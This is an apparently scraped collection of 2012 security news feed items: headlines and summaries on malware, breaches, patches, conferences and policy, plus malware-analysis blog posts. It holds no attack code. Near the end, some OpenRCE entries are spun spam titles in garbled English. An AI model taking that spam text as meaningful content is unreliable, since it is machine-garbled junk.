http://www.infosecurity-magazine.com/rss/news/ The ISO has released a brand-new cyber-security standard aimed at ensuring the safety of online transactions and personal information exchanged over the internet, including e-commerce, online banking, virtual medical records, remote office applications and more.

==> Wikipedia founder: arbitrary censorship “dangerous to the health of the internet”

http://www.infosecurity-magazine.com/rss/news/ The closing keynote at last weeks RSA Europe conference in London was delivered by internet pioneer Jimmy Wales, founder of Wikipedia, where he discussed the role the internet has played in promoting political discourse and the dangers that free speech encounters from censorship and government surveillance.

==> miniFlame emerges as small, highly targeted cyber-espionage tool

http://www.infosecurity-magazine.com/rss/news/ Spyware families are propagating, with the latest identified spawn being miniFlame, a small and highly flexible malicious program suitable for targeted, in-depth cyber espionage operations, according to Kaspersky Lab.

==> Home Office withdraws extradition order against hacker Gary McKinnon

http://www.infosecurity-magazine.com/rss/news/ Gary McKinnon is a UK hacker who has been fighting extradition to the US for more than a decade, accused of what a US attorney described as the biggest military hack of all time. Today home secretary Theresa May finally decided that his extradition should not proceed.

==> Facing a malware onslaught, Google plans scanner for mobile app market

http://www.infosecurity-magazine.com/rss/news/ Google is plotting ways to implement a client-side solution to prevent rogue apps from being downloaded from Google Play, the Android application store, according to an analysis.

==> UK government’s Facebook login proposals don’t hold water

http://www.infosecurity-magazine.com/rss/news/ Earlier this month there was much discussion in leading UK national newspapers about a proposal to allow the use of social media credentials to access government websites. This was confirmed by the Government Digital Service blog, which has promised more details in the next few weeks.

==> FBI issues Android malware warning

http://www.infosecurity-magazine.com/rss/news/ Poor Android. Googles smartphone operating system has offered a rich breeding ground for cybercrime in recent months, and theres little sign that the danger is abating. The latest is a warning from the FBIs Internet Crime Complaint Center (IC3), alerting the populace that the Loozfon and FinFisher malware strains are targeting Android devices again.

==> Google facing a double whammy from Brussels and the FTC

http://www.infosecurity-magazine.com/rss/news/ US and EU regulators are independently considering antitrust action against Googles Search practices, while EU privacy regulators have sent a letter criticizing Googles recently consolidated privacy policy.

==> Randomness and the Intel Ivy Bridge microprocessor

http://www.infosecurity-magazine.com/rss/news/ Cryptography Research (CRI) has published its investigation into the random number generator used by the Intel Ivy Bridge processor, the processor that is likely to be used by the majority of new PCs and laptops now and for the immediate future.

==> ENISA summarizes risks and opportunities of IT consumerization

http://www.infosecurity-magazine.com/rss/news/ The European Network and Information Security Agency (ENISA) has summarized both the risks and opportunities in the consumerization of IT, the business trend that includes BYOD.

==> TD Bank lost customer data – six months ago

http://www.infosecurity-magazine.com/rss/news/ The first public indication of the loss appeared on the California Attorney General website, with the publication of a sample notification letter now being sent to the banks affected customers.

==> ISF issues cybersecurity Benchmark as a Service

http://www.infosecurity-magazine.com/rss/news/ In an effort to make the evaluation of security resilience and risk reduction strategies more accessible, the Information Security Forum (ISF) has launched a Benchmark as a Service (BaaS) tool, for real-time benchmarking via the cloud.

==> Hackers and crackers invited to decode an 'unbreakable' secret message

http://www.infosecurity-magazine.com/rss/news/ Wannabe code-crackers have a fresh challenge to rise to, if DeTron has its way. The encryption company ran a full page ad in the New York Times late last week challenging code breakers, hackers and cryptographers to crack a message encrypted by Quantum Direct Key (QDK) a personal identification encryption technology aimed at eliminating multiple passwords for cloud services and web apps.

==> Oracle patch preview: prepare for a 'major' release

http://www.infosecurity-magazine.com/rss/news/ Along with crisp weather and autumn fashions, patch season has arrived: Oracle has pre-released information on the patches expected in its quarterly Critical Patch Update (CPU) on Oct. 16.

==> RSA Europe 2012: PCI compliance deflects attention from more important security risks

http://www.infosecurity-magazine.com/rss/news/ Is the IT security industry getting better at defending against threats? According to Josh Corman of Akamai Technologies, the answer is no, and there are some fundamental reasons why

==> New GCHQ Territorial (Spook) Army

http://www.infosecurity-magazine.com/rss/news/ The UKs Territorial Army is a paid force of part-time volunteers that make up around 25% of the armys manpower. It is considered an essential part of the UKs defense force. Now GCHQ is thinking of using the same principle to bolster the UKs cyber defense.

==> Malicious emails: Romney almost President

http://www.infosecurity-magazine.com/rss/news/ A new malicious email campaign pretends to be from CNN. It announces breaking news Mitt Romney is almost president. But it leads to a Blackhole exploit site.

==> Firefox 16 shipped, pulled and updated within 2 days

http://www.infosecurity-magazine.com/rss/news/ Firefox 16 was released on Tuesday, pulled from the download page on Wednesday, and replaced with Firefox 16.0.1 on Thursday. The main cause was that Tuesdays version introduced a new critical bug that was fixed by Thursday.

==> BYOD introduces gaping security holes for businesses

http://www.infosecurity-magazine.com/rss/news/ Bring your own device (BYOD) is gaining more and more ground within enterprises, as employees are increasingly using their personal smartphones and tablets to check email, edit documents and do other work. As a big trend affecting how businesses operate online, it is translating into ever-more complex security requirements for business IT.

==> Massive data breach at Florida college hits 279,000 students and employees

http://www.infosecurity-magazine.com/rss/news/ A large information breach at Northwest Florida State College has compromised the personal information of about 279,000 students and employees, according to the Florida Department of Education.

==> Law enforcement-grade malware increasingly used to target dissidents

http://www.infosecurity-magazine.com/rss/news/ Malware developed by the 'good guys' is increasingly falling into the wrong hands, according to a new report from Citizen Lab. The organization says that there is evidence of a growing commercial market for offensive computer network intrusion capabilities developed by security companies in Western democratic countries.

==> SMBs more vulnerable to data breaches than larger brethren

http://www.infosecurity-magazine.com/rss/news/ Contrary to conventional wisdom, hackers dont just target large enterprises with vast amounts of data to steal. Small- and medium-sized businesses are just as attractive of targets, and in some cases are more so.

==> RSA Europe 2012: Anonymous responds to Corman’s comments

http://www.infosecurity-magazine.com/rss/news/ Anonymous has very few hackers, it has very few activists It is very misleading to call the groups hacktivists. The common attribute is angst. The talented ones are either quitting or starting to do things that are more clandestine.

==> BYOA – the latest BYOx acronym to cause IT headaches

http://www.infosecurity-magazine.com/rss/news/ There is a large and still growing lexicon of BYOx acronyms: bring your own device, danger, services... Now Citrix adds detail to one of the latest threats: Bring Your Own Apps.

==> Teen hacker earns $60K for full Google Chrome exploit

http://www.infosecurity-magazine.com/rss/news/ A teenage hacker with the handle 'Pinkie Pie' has nabbed a $60,000 prize from Google, for launching a full Chrome exploit for the second time.

==> First annual report of cyber incidents in the EU

http://www.infosecurity-magazine.com/rss/news/ The European Network and Information Security Agency (ENISA) has published its first Annual Incidents Report from data supplied in conformance with Article 13a of the EUs telecom reform directive.

==> RSA Europe 2012: Cloud computing has potential to drive greater security

http://www.infosecurity-magazine.com/rss/news/ During a keynote session at todays RSA Europe Conference in London, Qualys chairman and CEO, Philippe Courtot, said the cloud can be a security enabler, despite many organizations continued hesitance to adopt widespread cloud technologies out of concerns over security and a lack of control

==> RSA Europe 2012: Symantec reports on trends, malicious server admin, and another Android trojan

http://www.infosecurity-magazine.com/rss/news/ The latest monthly intelligence report from Symantec shows current trends in spam, phishing, malware and malicious websites; but also provides insight in how criminals administer a compromised server, and describes a solar-powered Android app.

==> Rapid7 buys BYOD security firm Mobilisafe

http://www.infosecurity-magazine.com/rss/news/ Rapid7, the security risk assessment company behind Nexpose and Metasploit, has expanded its reach into the BYOD sphere with the purchase of Mobilisafe, a Seattle-based mobile risk management company.

==> Nat West suspends GetCash app following reports of fraud

http://www.infosecurity-magazine.com/rss/news/ GetCash was launched a few months back to allow customers who had forgotten their bank card (but not their mobile phone) to withdraw up to 100 as emergency cash from an ATM. Helpful banking; but for now it is suspended.

==> RSA Europe 2012: UK’s ID Assurance Programme puts verification choice into user’s hands

http://www.infosecurity-magazine.com/rss/news/ At this weeks RSA Europe Conference in London, representatives from the UK Government outlined details of a pan-government model for identity assurance that engages the services of third-party ID verification providers

==> Skype IM ramsomware worm spreading quickly

http://www.infosecurity-magazine.com/rss/news/ Skype users are being subjected to a social engineering-based attack via instant message, where messages purporting to be from friends contain malicious links that infect computers with Dorkbot variants.

==> Almost half of UK businesses have suffered insider-led data breaches

http://www.infosecurity-magazine.com/rss/news/ For 48% of IT practitioners in the UK, the sensitive personal data contained in their companys databases and native or cloud applications has been compromised or stolen by a malicious insider, new research has revealed. And, the majority of those practicioners (65%) also agree that they find it difficult to comply with privacy and data protection regulations in production and development environments.

==> Android adware, Zitmo botnets and Romanian hackers, oh my!

http://www.infosecurity-magazine.com/rss/news/ We're not in Kansas anymore: The third quarter of 2012 saw a marked increase in Android adware, while new evidence surfaced suggesting that the Zeus-in-the-Mobile (Zitmo) banking trojan is evolving into a botnet. And, Romanian hackers are continuing to perform large-scale scanning for web vulnerabilities, according to the quarterly threat assessment from Fortinet.

==> RSA Europe 2012: Information Security Industry Must Fix Skills Gap says (ISC)2

http://www.infosecurity-magazine.com/rss/news/ Speaking to Infosecurity at RSA Europe on 09 October 2012, John Colley - managing director of (ISC)2 EMEA declared the skills gap in the information security industry a big problem and suggested that entrance into the industry for graduates is dangerously difficult.

==> RSA Europe 2012: DDoS Attacks Used as Diversion Technique

http://www.infosecurity-magazine.com/rss/news/ DDoS attacks are being used as a component in the newly emerged multi-flank attacks, Symantecs deSouza told his audience at RSA Europe 2012 in London, 09 October 2012.

==> Spear-phishing – the cybercriminals’ scariest weapon

http://www.infosecurity-magazine.com/rss/news/ New research has looked at one of the cybercriminals most effective and deadly weapons: the socially engineered spear-phishing attack. It is frequently the first visible phase of an APT-style attack; but can be defended.

==> RSA Europe 2012: Replace perimeter-based security with intelligence-based security, says Art Coviello

http://www.infosecurity-magazine.com/rss/news/ Art Coviello, executive vice president , EMC Corporation and executive chairman, RSA, opened RSA 2012 with a very clear message in his keynote: perimeter-based security strategies need to be replaced with intelligence-based strategies.

==> Bad Bad Piggies – beware of fakes

http://www.infosecurity-magazine.com/rss/news/ No slouches in spotting an opportunity, the bad guys have already focused on Rovios new Angry Birds spin-off, Bad Piggies. Be careful what you install it might be a real pig.

==> Telecom vendors Huawei, ZTE pose cyber-espionage threats, lawmakers conclude

http://www.infosecurity-magazine.com/rss/news/ Two top telecom infrastructure vendors from China, Huawei and ZTE, pose potential cyber-espionage threats, according to a panel of US lawmakers on intelligence.

==> Mac-focused malware is big and getting bigger

http://www.infosecurity-magazine.com/rss/news/ Despite the Mac reputation as being more secure because of Apples tight control over its vertically integrated ecosystem, Mac-specific malware and advanced persistent attacks (APTs) against human rights groups is on the rise, cautions Citizen Lab Senior Security Analyst Seth Hardy.

==> World of Warcraft hit by hacking massacre

http://www.infosecurity-magazine.com/rss/news/ Apocalypse has come to World of Warcraft: whole cities have been massacred in the online adventure game, leaving nothing but smoking wreckage.

==> The 2012 Cost of Cyber Crime Report Says Successful Attacks Doubled

http://www.infosecurity-magazine.com/rss/news/ The 2012 Cost of Cyber Crime study is published today. Its good news and bad news. The frequency of successful cyber attacks has more than doubled over the last three years, but the annual cost to organizations has slowed dramatically in the last two years.

==> DarkAngle trojan masquerades as Panda Cloud AV

http://www.infosecurity-magazine.com/rss/news/ In a new twist to rogueware, Panda Security has warned that its cloud antivirus product name is being used to mask a particularly unpleasant trojan called DarkAngle. While victims may believe that they are installing anti-malware, they may actually be installing the malware itself.

==> American think tanks hit in wide-scale cyber-espionage push

http://www.infosecurity-magazine.com/rss/news/ American think tanks are becoming a big intelligence target for hackers from China and other countries, according to Rep. Mike Rogers (R-Mich.), chairman of the US House Intelligence Committee.

==> Veracode beefs up BYOD strategy with Marvin acquisition

http://www.infosecurity-magazine.com/rss/news/ Cloud-based application security testing vendor Veracode is bolstering its mobile app analysis practice area with the acquisition of Marvin Mobile Security for an undisclosed sum.

==> Top Android malware is adding features to cast a wider, more difficult-to-detect net

http://www.infosecurity-magazine.com/rss/news/ Android malware for premium SMS fraud continues to grow as a category, and most of it rests on the shoulders of one family of malware: Android.FakeInstaller. However, while FakeInstaller is well-known and included in mobile security software, hackers are now including new features geared to avoid detection and expand its reach.

==> Cybercriminality moves from guerilla to blitzkrieg

http://www.infosecurity-magazine.com/rss/news/ Cybercriminality is traditionally guerilla warfare: stay hidden, pop up, fight and run. But now RSA has detected a step-change in methodology - from hidden insurgency to full-frontal blitzkrieg involving 100 co-ordinated botnets.

==> Data loss, Wi-Fi and NFC identified as top mobile security concerns

http://www.infosecurity-magazine.com/rss/news/ Data loss is the biggest mobile security danger, reveals a new Cloud Security Alliance (CSA) report, but emerging concerns include rogue Wi-Fi access points and Near-Field Communications (NFC) exploitation.

==> UK plans £2M cybercrime center, as Hague warns of escalating international danger

http://www.infosecurity-magazine.com/rss/news/ Announcing that the UK is spending 2 million to set up a new cybercrime center, UK Foreign Secretary William Hague has warned that virtual threats are "one of the greatest global and strategic challenges of our time.

==> Obama or Romney? For public sector cybersecurity budgets, it may not matter

http://www.infosecurity-magazine.com/rss/news/ Hord Tipton knows a thing or two about the challenges infosec professionals face in the public sector. The executive director of (ISC) and former CIO of the US Department of the Interior recently sat down with Infosecurity to discuss these issues

==> FTC shuts down major international scareware scam

http://www.infosecurity-magazine.com/rss/news/ The US Federal Trade Commission has launched a major international crackdown on a scareware scam that has bilked consumers worldwide out of their tech support dollars in order to fix non-existent cyber-infections, freezing $180,000 of the alleged perpetrators assets.

==> Profile Stalker – an application that spams on Tumblr

http://www.infosecurity-magazine.com/rss/news/ gr8brittyn posted on Tumblr, Guys Im really sorry for the Profile Stalkr spam. If you havent already, DONT CLICK IT. I literally cannot figure out how to stop it and if you try to delete the posts, theyre instantly reposted. I cant edit them, delete them anything. PLEASE DO NOT CLICK!

==> Smartphone Wi-Fi searches offer massive new data leakage vector

http://www.infosecurity-magazine.com/rss/news/ Our mobile phones are unwittingly giving away threat vectors to would-be hackers (and, for that matter, physical criminals as well), offering criminals a new way to tap information housed on smartphones.

==> HMRC choses CPA-accredited encryption

http://www.infosecurity-magazine.com/rss/news/ HM Revenue and Customs (HMRC) chooses CPA over CAPS for its encryption both CESG-administered security accreditation schemes and saves the British tax-payer 2.4 million.

==> CIOs not yet sitting at the top table

http://www.infosecurity-magazine.com/rss/news/ Ernst & Young has been analyzing the status rather than the role of the CIO within business and finds it wanting. Without sufficient status, the potential of the role is sorely hampered.

==> Universal man in the browser malware allows real-time information processing

http://www.infosecurity-magazine.com/rss/news/ Hackers who employ the man-in-the-browser (MiTB) gambit to steal information from computer systems have found a way to more efficiently cast their net. According to researchers at Trusteer, a new strain of MiTB malware can adopt a one-size-fits-all approach to collecting compromising data from websites, eliminating the time-consuming process of parsing through specific logs for the sensitive bits.

==> Anthem Blue Cross settles data breach lawsuit in California

http://www.infosecurity-magazine.com/rss/news/ California insurance company Anthem Blue Cross has settled a lawsuit brought by the State of California over a data breach brought around by a lack of appropriate information data security processes at the insurer.

==> Fusion Center fail, says Senate Report

http://www.infosecurity-magazine.com/rss/news/ A US Senate Committee has produced a 140+ page report analyzing the operation and achievements of the hugely expensive fusion center programme and is far from satisfied with what it finds.

==> Ponemon Institute examines business logic attacks

http://www.infosecurity-magazine.com/rss/news/ A study by Ponemon Institute, commissioned by Silver Tail Systems, has examined what it calls 'business logic' attacks against websites. This is not hacking in the traditional sense. It is not breaking into into a server and exfiltrating data, it is the abuse of the legitimate logic of a website.

==> Hosting company PRQ raided by the Swedish police

http://www.infosecurity-magazine.com/rss/news/ PeRiQuito AB, a Swedish web-hosting company better known as PRQ and even better known as a host for Wikileaks and one-time host of The Pirate Bay, has been raided for the third time by the Swedish police. The reason is not yet known.

==> BYOD is driving privacy concerns among enterprise workers

http://www.infosecurity-magazine.com/rss/news/ Workers are developing privacy fears that employers are keeping tabs on them through bring your own device (BYOD) management software, according to new research from Fiberlink.

==> Hacktivist campaign targets universities

http://www.infosecurity-magazine.com/rss/news/ Hacktivist collective Team GhostShell is continuing its mission of drawing attention to what it perceives as societal ills, with a hack of data servers at top-rated universities across the globe.

==> Serious Twitter security flaw leads to account hijacking for love and money

http://www.infosecurity-magazine.com/rss/news/ Just days after Twitter direct messages hit the news as spreading malicious links, a new Twitter security flaw has reared its head. Daniel Dennis Jones, previously known by his Twitter handle @blanket, has found a loophole that lets hackers hijack and put handles up for sale.

==> Verizon exec appointed to NSTAC

http://www.infosecurity-magazine.com/rss/news/ The National Security Telecommunications Advisory Committee is about to get a new member, from a company with a strong public sector presence: President Obama intends to appoint Verizon Enterprise Solutions (VES) President John Stratton to the NSTAC.

==> 4.5 million routers hacked in Brazil

http://www.infosecurity-magazine.com/rss/news/ More than 4.5 million DSL modems have been hacked in Brazil by exploiting a vulnerability in the firmware. All affected modems used a chip from Broadcom.

==> Anonymous #OpVendetta set for 5th November

http://www.infosecurity-magazine.com/rss/news/ This weekend saw a leaflet paperstorm in London, with masked anons handing out flyers proclaiming #OpVendetta slated for 5th November in London. Led by Anonymous UK and Ireland, it is, we are told, the biggest Anonymous protest in the UK yet seen.

==> File-sharing for personal use is not illegal in Portugal

http://www.infosecurity-magazine.com/rss/news/ The latest move by rightsholders in Portugal in the ongoing war against file sharers has backfired dramatically: the Portuguese Prosecutor has declared that P2P file-sharing for personal use is not illegal.

==> White House targetted by spear-phishing attack

http://www.infosecurity-magazine.com/rss/news/ Against a combined background of heightened cyber tensions with China and physical military tensions in the Far East, plus the White House preparing an executive order to replace the rejected Cybersecurity Act, comes news that it was targeted in a spear phishing attack.

==> Businesses still lack confidence in the cloud

http://www.infosecurity-magazine.com/rss/news/ The Cloud Security Alliance (CSA) and ISACA have issued their Cloud Market Maturity report, outlining the top 10 issues with cloud adoption by businesses. They found that confidence is lowest in government regulation as a factor in driving or securing the market.

==> Proposal floated for shortened, secure domain names for UK businesses

http://www.infosecurity-magazine.com/rss/news/ Nominet, the organization that runs the .uk domain name infrastructure, has issued a proposal for shortened domain names that feature comprehensive security features for businesses.

==> New Android trojan uses camera app to recreate user's physical surroundings

http://www.infosecurity-magazine.com/rss/news/ Indiana University and the US Navy have created an experimental Android spyware trojan that takes over a devices camera to take photos and build a 3-D model of the mobile users surroundings. The information is then gathered and uploaded to a central server.

==> Level 3 enters the managed security market

http://www.infosecurity-magazine.com/rss/news/ Level 3 Communications has launched a new global security solutions portfolio meant to provide an integrated approach for enterprises, encompassing layered security services, Level 3's communications networking and professional services. The solutions will be rolled out in a managed services environment.

==> Verizon rolls out HIPAA-compliant healthcare security portfolio

http://www.infosecurity-magazine.com/rss/news/ Verizon Enterprise Solutions is focusing on the secure storing of electronic protected health information (ePHI) in its Terremark data centers as part of a new comprehensive cloud and data center infrastructure portfolio, specifically designed to help the healthcare industry meet the US federal Health Insurance Portability and Accountability Act (HIPAA) requirements.

==> ICO poised to fine illegal marketers

http://www.infosecurity-magazine.com/rss/news/ Earlier this year the ICO asked the public to report calls or texts received from an unknown sender using an online survey. It has received more than 30,000 complaints and today announced that it is set to issue two monetary penalties totaling well over 250,000 to two illegal marketers.

==> Rogue Pharma, Fake AV Vendors Feel Credit Card Crunch

http://www.krebsonsecurity.com/feed/ New research suggests that companies behind some of America's best known consumer brands may be far more effective at fighting cybercrime than any efforts to enact more stringent computer security and anti-piracy laws. Recent legislative proposals in the United States -- such as the Stop Online Piracy Act -- have sought to combat online trafficking in copyrighted intellectual property and counterfeit goods by granting Internet service providers and authorities broader powers to prosecute offenders, and by imposing stronger criminal penalties for such activity. But recent data collected by academic researchers suggests that brand holders already have the tools to quash much of this activity.

==> Critical Java Patch Plugs 30 Security Holes

http://www.krebsonsecurity.com/feed/ Oracle on Tuesday pushed out a bevy of security patches for its products, including an update to Java that remedies at least 30 vulnerabilities in the widely-used program.

==> The Scrap Value of a Hacked PC, Revisited

http://www.krebsonsecurity.com/feed/ A few years back, when I was a reporter at The Washington Post, I put together a chart listing the various ways that miscreants can monetize hacked PCs. The project was designed to explain simply and visually to the sort of computer user who can't begin to fathom why miscreants would want to hack into his PC. "I don't bank online, I don't store sensitive information on my machine! I only use it to check email. What could hackers possibly want with this hunk of junk?," are all common refrains from this type of user. I recently updated the graphic (below) to include some of increasingly prevalent malicious uses for hacked PCs, including hostage attacks -- such as ransomware -- and reputation hijacking on social networking forums.

==> Critical Adobe Flash Player Update Nixes 25 Flaws

http://www.krebsonsecurity.com/feed/ Adobe has issued an update for its Flash Player software that fixes at least 25 separate security vulnerabilities in the widely-installed program. The company also pushed out a security patch for its Adobe AIR software.

==> ‘Project Blitzkrieg’ Promises More Aggressive Cyberheists Against U.S. Banks

http://www.krebsonsecurity.com/feed/ Last week, security firm RSA detailed a new cybecriminal project aimed at recruiting 100 botmasters to help launch a series of lucrative online heists targeting 30 U.S. banks. RSA's advisory focused primarily on helping financial institutions prepare for an onslaught of more sophisticated e-banking attacks, and has already received plenty of media attention. I'm weighing in on the topic because their analysis seemed to merely scratch the surface of a larger enterprise that speaks volumes about why online attacks are becoming bolder and more brash toward Western targets.

==> Chinese Hackers Blamed for Intrusion at Energy Industry Giant Telvent

http://www.krebsonsecurity.com/feed/ A company whose software and services are used to remotely administer and monitor large sections of the energy industry began warning customers last week that it is investigating a sophisticated hacker attack spanning its operations in the United States, Canada and Spain. Experts say digital fingerprints left behind by attackers point to a Chinese hacking group tied to repeated cyber-espionage campaigns against key Western interests.

==> Espionage Hackers Target ‘Watering Hole’ Sites

http://www.krebsonsecurity.com/feed/ Security experts are accustomed to direct attacks, but some of today's more insidious incursions succeed in a roundabout way -- by planting malware at sites deemed most likely to be visited by the targets of interest. New research suggests these so-called "watering hole" tactics recently have been used as stepping stones to conduct espionage attacks against a host of targets across a variety of industries, including the defense, government, academia, financial services, healthcare and utilities sectors.

==> New Search System, No More Accounts Needed [1]

http://www.offensivecomputing.net/?q=node/feed The new search system with the updated authentication system is online. There is still some missing functionality but it should let everyone download samples. If you find any problems please let me know. There will be some quirks as we move to the new version of the website. If you find any bugs please let me know on Twitter @openmalware. Danny [1] You still need a Google account to download the samples

==> State of Offensive Computing

http://www.offensivecomputing.net/?q=node/feed I would like to take this time to thank everyone that expressed their support while Offensive Computing was offline. It was a trying time and I really appreciate everyone's support. Without getting into any of the specifics of why the site was offline for two months, we are back and here to stay. There are a couple of people who were instrumental in helping to keep everything up and running. Paul Royal, from the Georgia Tech Information Security Center helped out significantly with hardware and the new home of the site. Kelcey Tietjen also stepped in and helped out tremendously. If you see either of them at some upcoming conferences (hint: Paul is giving a talk at Blackhat) buy them a drink. There are a couple of changes that are going to happen that more accurately reflect the intentions of the site. First, the name will be changing to Open Malware. The new name more accurately reflects the purpose and intention of the site. Way back in 2005 the intention was to make this a place where you could find information related to malware and other types of hacking. As things (and life) have progressed it has changed into a malware research site, specifically with the ability to download malware samples. The domain will be OpenMalware.org in the very near future. The second big item of news is that we will be transitioning to a download-only malware repository in the coming weeks. The blog site will be officially shutting down. There are much better forums maintained by commercial services that have taken up the role of a discussion area. Specifically the /r/ReverseEngineering and /r/Malware sub-Reddits, and OpenRCE are better avenues of communication. I will maintain a static version of the site to archive the old content. To accommodate the new download site, there will be a couple of changes. First, a lot of the back end software has changed. Searches will be faster, more malware will be available, and the overall maintenance will be a lot easier. Second, you will need to have a valid, verified Google Account. Having a Google account allows us to use industry standard authentication, and most importantly not to have to maintain a user database. Get one here if you haven't already. In the meantime new account creation is disabled while we make the transition. Old accounts should work as normal. Finally, we are discontinuing our commercial services. I would like to thank all of our customers for their business. You all helped to support this site and maintain an open service. We will be looking at transitioning to a non-profit status in the coming years. Thanks again, Danny Quist

==> VizSec 2012 Call for Papers Out

http://www.offensivecomputing.net/?q=node/feed VizSec 2012 will be held in mid-October as part of VisWeek in Seattle. Papers are due July 1. The International Symposium on Visualization for Cyber Security (VizSec) is a forum that brings together researchers and practitioners from academia, government, and industry to address the needs of the cyber security community through new and insightful visualization techniques. Co-located this year with VisWeek, the 9th VizSec will provide new opportunities for the usability and visualization communities to collaborate and share insights on a broad range of security-related topics. Accepted papers will appear in the ACM Digital Library as part of the ACM International Conference Proceedings Series. Important research problems often lie at the intersection of disparate domains. Our focus is to explore effective, scalable visual interfaces for security domains, where visualization may provide a distinct benefit, including computer forensics, reverse engineering, insider threat detection, cryptography, privacy, preventing 'user assisted' attacks, compliance management, wireless security, secure coding, and penetration testing in addition to traditional network security. Human time and attention are precious resources. We are particularly interested in visualization and interaction techniques that effectively capture human analyst insights so that further processing may be handled by machines, freeing the analyst for other tasks. For example, a malware analyst might use a visualization system to analyze a new piece of malicious software and then facilitate generating a signature for future machine processing. When appropriate, research that incorporates multiple data sources, such as network packet captures, firewall rule sets and logs, DNS logs, web server logs, and/or intrusion detection system logs, is particularly desirable. More information is on the web site: http://www.ornl.gov/sci/vizsec

==> Scalable, Automated Baremetal Malware Analysis

http://www.offensivecomputing.net/?q=node/feed This week I will be presenting on scalable, automated baremetal malware analysis at Black Hat Europe. My presentation will coincide with the release of NVMTrace, a tool that facilitates automated baremetal sample processing using inexpensive hardware and freely available technologies. More information is available at the following link: Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis If you are attending Black Hat Europe and malware analysis is a topic of interest to you, please attend my talk. If you are interested but will not be in attendance, please let me know and I will make my whitepaper and slide set available to you.

==> BHO Reversing

http://www.offensivecomputing.net/?q=node/feed From a long time for those days (BHO is supported since IE 4.0) malware writers exploit BHO functionality to bully on IE users. Mostly evil BHO has two functionality ( for sure if we talk about bankers): - monitoring/logging requests sending by browser POST dump - password stealing - HTML page code dynamic modification HTML code injection - used for e.g - adding additional form fields intended to obtain, more amount of TAN codes or generally some (...) Read entire post here: BHO Reversing

==> Practical Malware Analysis - A Book Review and Curmudgeonly Rant on the State of Reverse Engineering

http://www.offensivecomputing.net/?q=node/feed Recently I was asked to review a pre-publication copy of Mike Sikorski and Andrew Honigs book Practical Malware Analysis by Nostarch Press. I gave it an enthusiastic review, and I strongly believe this will become the defacto text for learning malware analysis in the future. This is a review of that book, and a short rant on reverse engineering. Before getting into Practical Malware Analysis, I hope you will indulge me in a rant about other books on the reverse engineering topic: They are not pretty. If youve taken one of my classes I recommend a few books for learning reversing, but climbing the steep mountain of pre-requisite material before you can attempt to be somewhat proficient is daunting. Specifically the books I recommended were based off of each individual authors own personal style of reverse engineering with the tools that were available at the time. The field has gotten much more accessible thanks to the awesome tools that are out there from companies like Hex-Rays and Zynamics. Practical Malware Analysis does a good job of tying together the methods of modern malware analysis. While most of the previous texts have done a good job of presenting the state of the art at their time, PMA overviews many of the tools that are in use in the modern day. Part 1 starts off with the basic static techniques, how to set up a virtual environment, and dynamic analysis. These initial steps are the basis for any good reversing environment. What is nice is that these topics arent dwelled on for an entire book. Part 2 goes over the relationships of the Intel architecture, IDA Pro, modern compilers, and the Windows operating system to reverse engineering. Having an understanding of this as it applies to the reversing process is extremely important. Outside implementing a compiler, learning the fundamentals of the architecture is the most important skill a reverser can have for understanding the field. The difference between an adequate reverser and a great reverser lies in the understanding of how the system interactions work. The rest of the book is focused on the advanced topics of dynamic analysis. Part 5 deals with all the ways that malware authors can make your life miserable, from anti-disassembly to packers. Part 6, Special Topics, talks about shellcode analysis, C++ specifics, and the ever-looming threat of 64-bit malware. I suspect that there will be a second edition once 64-bit malware comes in vogue. Overall the book is excellent for those that are new to this field. Experts love to curmudgeonly talk about how nothing is new anymore, everything sucks, and pine for the good old days of reverse engineering with some wire-wrap, a lead pencil, a 9-volt Duracell, and a single LED. If you consider yourself one of these people, reading this book is going to feel a lot like wearing someone elses underwear. If, on the other hand, you read it and put aside your natural skepticism of all things new, you might learn something. I really do like this book. Edit 3/4/2012: I have no financial interest in the book. The only thing I received was a reviewers copy. This was not sponsored or paid for in any way by the authors or publishers.

==> CAST Slides: Hunting malware with Volatility v2.0

http://www.offensivecomputing.net/?q=node/feed Last week i had a speech at the CAST forum about hunting malware with volatility 2.0. On 40 slides i will introduce the main features of this powerful forensic framework. All memory dumps being discussed are snapshots from infected machines with modern malwares and rootkits. http://reconstructer.org/papers/Hunting%20malware%20with%20Volatility%20v2.0.pdf

==> Introduction to IDA Python

http://www.offensivecomputing.net/?q=node/feed The Introduction to IDA Python document by Ero Carrera is one of the better documents on scripting the IDA Pro platform available. After talking with Ero directly, I have received permission to host the PDF directly on Offensive Computing to make it available long-term. Enjoy. Introduction to IDA Python by Ero Carrera Danny

==> CSI:Internet series - Spyeye detection with Volatility v2 and kernel debugging the TDL4 rootkit

http://www.offensivecomputing.net/?q=node/feed Just in case you missed my forensic analysis contributions for the CSI:Internet series on h-online.com... CSI:Internet - A trip into RAM http://www.h-online.com/security/features/CSI-Internet-A-trip-into-RAM-1339479.html CSI:Internet - Open heart surgery http://www.h-online.com/security/features/CSI-Internet-Open-heart-surgery-1350313.html Enjoy!

==> Make An objective Find A fabulous Dentist

http://www.openrce.org/rss/feeds/blogs written by sweetyan88.

==> How Health care Clinics For Columbia SC Will Get Lower back Your Self-esteem

http://www.openrce.org/rss/feeds/blogs written by sweetyan88.

==> Computer Security Jobs Board

http://www.openrce.org/rss/feeds/blogs written by CompuSecJobs.

==> PAGE_EXECUTE_WRITECOPY As Anti-Debug Trick

http://www.openrce.org/rss/feeds/blogs written by waleedassar.

==> Thread Injection Finder Tool

http://www.openrce.org/rss/feeds/blogs written by palaniyappan.

==> darkc0de.net

